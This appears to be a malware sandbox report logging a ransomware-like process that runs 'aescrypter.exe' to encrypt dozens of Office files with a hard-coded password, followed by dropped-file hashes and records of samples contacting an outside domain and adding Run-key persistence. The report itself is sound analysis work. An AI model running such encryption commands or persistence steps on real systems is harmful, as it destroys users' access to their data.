"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

Network

N/A

Files

\Windows\SysWOW64\dcomcnfgui.exe

MD5 17fa49e023cb95cdfe365abc0d7290d0
SHA1 5a94bbd98de20bbb415b7378226490e220d8cf83
SHA256 ec855befa1b088809f15cf08266ae576d1885cb8374f69fcb936094341ae7675
SHA512 a1e9c82f88fec277b2446c2f2f64c6c43c3b72d9f2a84d04ae4e7ea3d4e2f1283f9b5fbebf5611ccb4132a49e99532b92ca9db875cfb4cd5e825c42a5ba1924f

\Windows\SysWOW64\ucsvcsh.exe

MD5 625ba9cf557dbb1ffac001e2a0300d32
SHA1 bf0fe5fdd91cdb849dd36fd9a017aa08ae8e0907
SHA256 d80adafe8c367753dd7e6cb282ef55af4257b6a9d06ac8aa1300f2cda9ade46c
SHA512 dec748b7d46d42beebb1a5a83e771de9b3c2c06a5e67a48ce4d2f49d0dd2d846baaf8fba78e698f00da9901706433fa34f4e25c7734049ee5904c591ad8c0000

C:\Windows\SysWOW64\csrsstub.exe

MD5 6f36e46b83a61a5e251460ad825f425e
SHA1 8206aeb2bf3f9fe1ef2602a0b34138c170a888e5
SHA256 35e03b690797208e0bedaa29a6decf78ac43236e89dd7f98f96962f8df86037e
SHA512 5fed7460b588217c284123add5f3c57a4f24c23a3f8b8dc7875768b8b880a67c854e230da0322a7dc9e0f295a4bbbc568d2c260e5fcad22f2d59cec24289a387

C:\Windows\SysWOW64\tcpsvcss.exe

MD5 9225773aa6641d29ac88ca5eb6baeccf
SHA1 6120d219c2afca4b262ce07fb56cd260d9d17696
SHA256 7ae63718b10429d82d5c510ed03ad855d7b997a32f74bbb3062c7dea01ea7c0c
SHA512 c94fbdf29cc024ae9268203ddc8dd325466242c93a55ef51df82775f213597ab92ee0a6c109dcccdc109056781505bf92b8a53de7ae5f0a9387bebe8b269f928

C:\Windows\SysWOW64\tracerpts.exe

MD5 53894890dc01bbcace449f6590a1597b
SHA1 b27c93ef650d79a49150e61cd668b01bee543a30
SHA256 2f3f037b07737101076f50664ea3af10f76970febdcba4bd0e38d5a0eca4f6dd
SHA512 2ab1d894688ba8ee4129c575a116e7d01840d553a3956c3c158921e0794207ae9d0396c4c848c9e6592f40466e893ed19165e5eb34c53e02fe19fb65265c3a5a

C:\Windows\SysWOW64\wcmtstcsys.sss

MD5 9abaa20254e67cec16013d1b4a01e273
SHA1 7a9e0ab51b32ab6368d99108bbf3e1ffdbd52c92
SHA256 0d342414df89f312016376cb8b8ecd5a4b5c5d6484ba72a926f61503e6717c57
SHA512 76a3542176728d052233fd197e826c8bf61d525afc5a7d5c9a823e2f8a04f873f22e38647c5751413f095dc96175ea56bacec66465575f450489dae4109e0ca4

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gltsapi.coetech.com udp
US 199.59.243.227:80 gltsapi.coetech.com tcp

Files

memory/1792-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmp

memory/1792-1-0x0000000001280000-0x00000000012EE000-memory.dmp

memory/1792-2-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

memory/1792-3-0x000007FEF5573000-0x000007FEF5574000-memory.dmp

memory/1792-4-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

123s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gltsapi.coetech.com udp
US 199.59.243.227:80 gltsapi.coetech.com tcp

Files

memory/2172-0-0x000007FEF6543000-0x000007FEF6544000-memory.dmp

memory/2172-1-0x00000000013C0000-0x000000000142E000-memory.dmp

memory/2172-2-0x000007FEF6540000-0x000007FEF6F2C000-memory.dmp

memory/2172-3-0x000007FEF6543000-0x000007FEF6544000-memory.dmp

memory/2172-4-0x000007FEF6540000-0x000007FEF6F2C000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

240s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A
File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Setup (5).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2380 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\Setup (5).exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
PID 2380 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\Setup (5).exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
PID 2380 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\Setup (5).exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
PID 2380 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\Setup (5).exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
PID 2240 wrote to memory of 1820 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
PID 2240 wrote to memory of 1820 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
PID 2240 wrote to memory of 1820 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
PID 2240 wrote to memory of 1820 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
PID 2240 wrote to memory of 3032 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
PID 2240 wrote to memory of 3032 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
PID 2240 wrote to memory of 3032 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
PID 2240 wrote to memory of 3032 N/A C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Setup (5).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"

